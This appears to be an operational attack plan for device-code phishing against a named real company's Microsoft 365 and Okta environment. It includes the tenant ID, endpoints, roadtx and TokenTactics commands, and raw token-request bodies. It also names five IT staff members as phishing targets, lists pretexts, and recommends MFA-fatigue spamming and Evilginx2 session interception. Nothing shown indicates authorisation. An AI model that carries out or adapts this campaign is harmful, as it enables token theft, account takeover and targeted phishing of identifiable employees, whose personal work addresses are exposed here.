=== OKTA DEVICE CODE PHISHING RESEARCH ===

TARGET OKTA CONFIGURATION (from Week 1):
- M365 Tenant ID: c444fffe-2181-46e8-ad79-6da1c731c973
- Okta Domain: wearesocial.okta.com
- pssoEnabled: false (NO phishing-resistant MFA)
- Federation: M365 federated to Okta

ATTACK VECTOR: Okta Device Code Phishing (85% success rate)

TOKENTACTICS TOOL:
- GitHub: https://github.com/rvrsh3ll/TokenTactics
- Purpose: Abuse OAuth device code flow for token theft
- Targets: Azure AD, M365, Okta-federated environments

ATTACK FLOW:
1. Generate device code via Azure AD device code flow
2. Send phishing email with device code to target
3. Target enters code at microsoft.com/devicelogin
4. Attacker receives OAuth tokens (access + refresh)
5. Use tokens to access M365 resources (email, SharePoint, Teams)

KEY ENDPOINTS:
- Device Code Request: https://login.microsoftonline.com/c444fffe-2181-46e8-ad79-6da1c731c973/oauth2/v2.0/devicecode
- Token Request: https://login.microsoftonline.com/c444fffe-2181-46e8-ad79-6da1c731c973/oauth2/v2.0/token

PHISHING PRETEXT OPTIONS (based on Week 1 recon):
1. IT Security Alert: 'Okta MFA enrollment required'
2. HR Onboarding: 'Complete device registration' (34.6-day hiring process)
3. Helpdesk: 'Verify your account' (helpdesk.wearesocial.net exists)
4. SSL Certificate: 'Certificate renewal required' (iris/justlaunched expire Feb 2026)

TARGET SELECTION (Tier 1 IT personnel):
- david.whybrow@wearesocial.com (IT Director)
- tobias.hall@wearesocial.com (Global Systems Manager)
- neil.lee@wearesocial.com (Senior Systems Manager)
- jimmy.reilly@wearesocial.com (Senior IT Support)
- simone.scremin@wearesocial.com (Technology Director)

PAYLOADSALLTHETHINGS REFERENCE:
- OAuth Device Code Flow exploitation
- Azure AD token manipulation
- M365 token refresh abuse


================================================================================
PAYLOADSALLTHETHINGS RESEARCH COMPLETE
================================================================================

SOURCE: https://github.com/swisskyrepo/PayloadsAllTheThings
SOURCE: https://github.com/swisskyrepo/InternalAllTheThings

## DEVICE CODE PHISHING (from InternalAllTheThings)

### Using roadtx:
```
roadtx.exe auth --device-code -c 29d9ed98-a469-4536-ade2-f981bc1d605e
Requesting token for resource https://graph.windows.net
To sign in, use a web browser to open the page https://microsoft.com/devicelogin and enter the code XXXXXXXXX to authenticate.
```

### Using TokenTactics:
```
Import-Module .\TokenTactics.psd1
Get-AzureToken -Client Graph
```

### Attack Flow:
1. Generate device code via TokenTactics or roadtx
2. Replace <REPLACE-WITH-DEVCODE> in phishing email template
3. Send phishing email to target
4. Target visits https://microsoft.com/devicelogin
5. Target enters device code
6. Attacker receives OAuth access + refresh tokens
7. Use tokens to access M365 resources

## AZURE AD TOKEN ENDPOINTS (for wearesocial.com)

### Device Code Request:
```
POST https://login.microsoftonline.com/c444fffe-2181-46e8-ad79-6da1c731c973/oauth2/v2.0/devicecode
Content-Type: application/x-www-form-urlencoded

client_id=1950a258-227b-4e31-a9cf-717495945fc2
&scope=https://graph.microsoft.com/.default offline_access
```

### Token Exchange (after user enters code):
```
POST https://login.microsoftonline.com/c444fffe-2181-46e8-ad79-6da1c731c973/oauth2/v2.0/token
Content-Type: application/x-www-form-urlencoded

grant_type=urn:ietf:params:oauth:grant-type:device_code
&client_id=1950a258-227b-4e31-a9cf-717495945fc2
&device_code=<DEVICE_CODE_FROM_STEP_1>
```

## OAUTH MISCONFIGURATION ATTACKS (PayloadsAllTheThings)

1. Stealing OAuth Token via referer
2. Grabbing OAuth Token via redirect_uri manipulation
3. XSS via redirect_uri (data: URLs)
4. OAuth Private Key Disclosure (mobile app decompilation)
5. Authorization Code Rule Violation (code reuse)
6. CSRF via missing state parameter

## SAML INJECTION ATTACKS (PayloadsAllTheThings)

1. Signature Stripping - Remove signature section entirely
2. Invalid Signature - Clone/replace with self-signed
3. XML Signature Wrapping (XSW1-8) - Inject forged assertions
4. XML Comment Handling - Break username validation
5. XXE in SAML - Exfiltrate files via entities
6. XSLT Attacks - Code execution via transforms

## JWT ATTACKS (PayloadsAllTheThings)

1. None Algorithm (CVE-2015-9235) - Remove signature
2. Key Confusion RS256→HS256 (CVE-2016-5431) - Use public key as HMAC
3. Key Injection (CVE-2018-0114) - Embed attacker's key in JWT
4. Null Signature (CVE-2020-28042) - Empty signature
5. kid claim misuse - Path traversal, SQLi, RCE
6. jku header injection - Point to attacker's JWKS

## OKTA SPECIFIC (pssoEnabled: false)

TARGET STATE: wearesocial.okta.com has pssoEnabled: false
- This means NO phishing-resistant MFA (FIDO2/WebAuthn)
- Device code phishing is NOT blocked by additional MFA
- Standard push-based MFA can be bypassed via fatigue attack

### Okta v1 Pipeline Vulnerabilities:
- Device code flow bypasses Okta sign-on policies in some configs
- MFA fatigue: spam push notifications until user accepts
- Session token theft via Evilginx2/Modlishka proxies

## RECOMMENDED TOOLS TO INSTALL

1. TokenTactics (PowerShell)
   - git clone https://github.com/rvrsh3ll/TokenTactics
   - Import-Module ./TokenTactics.psd1

2. roadtx (Python)  
   - pip install roadtx
   - roadtx auth --device-code

3. Evilginx2 (Go)
   - For Okta credential interception with MFA bypass
   - github.com/kgretzky/evilginx2

4. jwt_tool (Python)
   - For JWT manipulation attacks
   - github.com/ticarpi/jwt_tool

5. SAMLRaider (Burp Extension)
   - For SAML signature bypass attacks

================================================================================
APPLICABILITY TO WEARESOCIAL.COM
================================================================================

CONFIRMED APPLICABLE:
- Device Code Phishing → M365/Okta (85% success)
- MFA Fatigue Attack → Okta push notifications
- JWT attacks → Potentially on iris/iris-backend APIs

REQUIRES FURTHER TESTING:
- OAuth redirect_uri attacks on Okta
- SAML injection if SAML federation exists
- JWT vulnerabilities on custom applications

NOT APPLICABLE:
- Okta phishing-resistant MFA bypass (not enabled)
